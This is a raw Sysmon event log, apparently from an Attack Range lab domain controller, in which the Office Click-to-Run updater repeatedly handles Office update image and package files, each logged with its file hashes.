Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-140.pngMD5=E958C73EF77EFCC4D4D2574720369E92,SHA256=D42365DA8506F9ACBD428103DD38DADA366283966080EBDDF0010D42FC9FD039,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-100.pngMD5=F93D3BAE51A5545E34DBD0ED2DA67DE3,SHA256=97BBA11C3DC559EBE68E0DB3B673512BD06A453E4D13FF9C4989C152BD2822A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogo.scale-80.pngMD5=FC51024EA87308701A8227A24C12EA2C,SHA256=0A05F8D5863006C42F9A876EB6BE99F7713E5F3A8901E3DED817EF2A9068F8A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogo.scale-180.pngMD5=1C371AA122D4011F85039C5D3B7B5931,SHA256=26BB1DBB0AEC9922EC1C71215C4D33F164A91965079FBD976F46B2640310A058,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogo.scale-140.pngMD5=A748D8EB8878DA963ED01A6D1A4E8DA8,SHA256=2BBE8B4D878011A522546E12E812DAB267EFA43DBC323EE6C53807D7BB1F8CE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogo.scale-100.pngMD5=6790252517ACACA6AEE66B7765165DFC,SHA256=17E01C86794EDED6B8EF959DF22597219EB002DA9F5B5753DBD5DD6F0F5F1049,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-80.pngMD5=66E8E5ED3E538E4512CC8B762C15C17F,SHA256=5CAE84EF92E598D6497A26967787065E43876CA48C580B4FA49E3C980A8395DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-180.pngMD5=8FB58F28AADB47F58DD3311AB094DA76,SHA256=C7E34A0159C728DCA10F367DCF36AB6567218EEBF95633AEDC4365D5BB2F56BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-140.pngMD5=8A39E7826CD0E697B2010E707CC7E6F7,SHA256=2950D503B0C6C6DFCA5BF7DE8C20578BA84AFAC489756FCE629BC6BE8F8C0F59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-100.pngMD5=61370B2C646491FE36C6B83DCFB404F8,SHA256=6E12B8B1A6D4E96827C2B11DBA7A732229A8BB2A54E15D6CB138BCD1BB09FAEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-80.pngMD5=1CBD5F9DE2BB547FEA63ACA192C04573,SHA256=E0F8AAD0790796753E998EDD587D7DA7B5E206797F73B0A02933EFAEECC89439,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-180.pngMD5=A3A3DCA9099A69D7DA64B64980497AC6,SHA256=099FAD985652CD634C4685ADAC0811A8E48F4F6CE3B0BC00DB49903FDAA89B4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-140.pngMD5=374E2729C2A825A1464629E5196A5CB6,SHA256=D5B202FDF17200AB999958AD551270D33DB7C89CF2041630CC35018435DDA3CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-100.pngMD5=48B6E8658EBEEDCDD74C78F0DF460A1D,SHA256=B2CD672A6E6828FCD0F7065FA6B7A002CE8A25AF40BED0BFCDC8C0AD1E49F2C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogoSmall.scale-80.pngMD5=D382294A3ECB55BD57D3DC909AF98564,SHA256=9F7F8C3786EC9F2A3193590D1A16DC6FA47FEF51F03DEB3D652F0606456469DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogoSmall.scale-180.pngMD5=96CAE17A79CFECBEB0EAEA2A30F76FBE,SHA256=5A5C56797F11DA1267858746E17FC52A8430F7DAFE0A806C35132B49D7B39A73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogoSmall.scale-140.pngMD5=5AC4F25D855CB30838C04A6839F330BD,SHA256=3513D01CF34BB7F73F36A5ED4BABD2E659201C8393DADDAC21A1E9E341328209,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogoSmall.scale-100.pngMD5=B62085A570A4A12E46A3DD73036F7223,SHA256=F11FA2B1DA1CF6EC4C5F2733C4164CBDE2B3CFE9A8F0C256438E4A74A5B8C7B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-80.pngMD5=C6A78E35CBE5185CC135359F79A69AA4,SHA256=DFE62BC935DAA6B2F450CCA0C841E19976930D3E7C46408A501D47B78F2A5728,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-180.pngMD5=810B1673F874543AB2D279D7D9B1AE0F,SHA256=9E2234333959CE12066FF28C8BECA24A750BF76BA77A062B68F1BC8F20695162,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-140.pngMD5=4E4AC9B63C05E2FDE6712F91CD7FE712,SHA256=154EDB9CC6FFD1771E722CD755E4CE512EFFE5B4004CFFF3CC7569BB5AF9250A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-100.pngMD5=D234C94F02FDCBA983FBCCD6CB44F064,SHA256=3210F382082C1CAE1CD571F31F940A86B0B0B6474C8C0358C31152F3225D20A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-80.pngMD5=5B89ABB1156409BEED4653712D55913C,SHA256=C883FA89163269C2849ECE292A2D68E6BF99F1712B115EABD22AC6F2EEDA07DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-180.pngMD5=E6B5FF7340FEE416173432CA1704718B,SHA256=F5F16AE486C4ADED936B567F2CA6470B6D82D1379D5DFD83A1CB8516780B1063,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-140.pngMD5=B44EA9F00213F3713FA4303435100293,SHA256=5AE3AF0AC939789158A209C9906BAA01ABF8BE5494F01F816E1845F7D66CFF03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-100.pngMD5=2D488CD53F9BCDDA85FD434C41B05685,SHA256=9F9088F082D3E30E1E3E781A96E5064DDA15FF48070709B7D0578ECB9B439EA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogo.scale-80.pngMD5=920D7C0956F13BF6A8BE728424E1F016,SHA256=51DDBA29F8ECD6E2463B2A873CD8B0FD2496397771E07226781DFD7A5BE46462,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogo.scale-180.pngMD5=75CEE77C693978E0B54AB3D3E50B43D7,SHA256=D3C63AAD20E56400497D85A52298E259F11873D873AEAD6CF0A7725487589498,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogo.scale-140.pngMD5=5F94F3ED8B0D992E9CD85CF2E8F5754A,SHA256=A581AE91A55071E05177998A19A1FC0E7CB1CC1CFC9D15A3969DC1C388B38993,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogo.scale-100.pngMD5=70F66A51A595B799CD308D5A6C3C4AFA,SHA256=5E3BCEF3B54BCFE0038B7CBEAE2BCE92B6F953F69C2B8EDF5C66C807B2BA2875,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-80.pngMD5=BE801F8132ABBFB76001C885176A9328,SHA256=EAB08DB0CCA71BB973B864B45CEDF95D842F722A319EDE055A894079360BE1A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-180.pngMD5=CF49F1C4CF62D49170CFA86698946CD0,SHA256=61F8C1E164BD2E963A2E45953C53AA88A321FE12253512DA0D8C45EB84C62B99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-140.pngMD5=896E7E6D5D83AADFADF1A551031AA92F,SHA256=5812EC709E1A8EB5BC461D1ECC694FEB9E5AFAC8D0D9A0AE9B061BBCB3543856,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-100.pngMD5=25FA46B7005F35C5A6896E38136AAB2F,SHA256=90EA48B01D81A47C80BE2F8F208E11FE827E68833A83922152B6DA37B8945FF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-80.pngMD5=A968F7B79074B165CF9D3FF3119FEE19,SHA256=27F1371F3691AB3C406C9814F341C1D6C67A77B68BFBA2D05E594EAE5556A791,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-180.pngMD5=546430D9213D9C9711AEEBEFE262CE69,SHA256=93DD16D28B39A26FAD399E8F26684A09468E0927F2D9660B4B30A11D9326838B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-140.pngMD5=FB6B1BF95648FF857BC7840547969921,SHA256=CE2EFB4A852D5C7C6B88C0B9FD69F6763EF14AF9D6401E0EBE75EC4C60BE5860,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-100.pngMD5=DCA7B42D5D983AFD9473E4770CB20A2F,SHA256=640EBC830E235F61B5BE466250DF4FCB1B00424F49FA1CFE77719EC5290B703F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCardRollback\TPN.txtMD5=C925EC060C240DD2DCE2109AE5663749,SHA256=10922C2B3F7239F10C0DAB1E92132813BE027C4C142142493BA5C90FFB14563F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCardRollback\lpc.win32.bundleMD5=EDAAE5D6EF80B8AE0463910915BAA206,SHA256=EDAE11FED67A3253FEFB6B16D164A7594D1B82C7455BB197A8585532096C3555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCardRollback\images\default\linkedin_logo_small.pngMD5=D7838C32A6505EDF01B3C9E4661EF745,SHA256=96FE970DCA25141CE337195748567EAFEEB7F6EDB4BA7919EF1948A05DF2CFED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCardRollback\images\default\linkedin_logo_large.pngMD5=32280C53148B8347AE63ADD2385EB8BB,SHA256=3C9947ADB0429BC2B3EA52FAF11EE0134BFAF95F637C05D93BE1A02A90729C56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCardRollback\images\default\linkedin_logo.pngMD5=09432B6216C165D665680F77528377AD,SHA256=3969C485556F3E08C0DDC0874F9BF899C0F8000C4D2BDA8B3FAF65063F24A6DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LivePersonaCardRollback\images\default\linkedin_ghost_school.pngMD5=C68093A7FFEB0050EEBCB2F8DA7B79E1,SHA256=76E56FD7F6DBE7DE8644C66C4FE374E97FB2477AE6F6D8FEFCA3F77B97D3759F,IMPHASH=00000000000000000000000000000000falsetrue 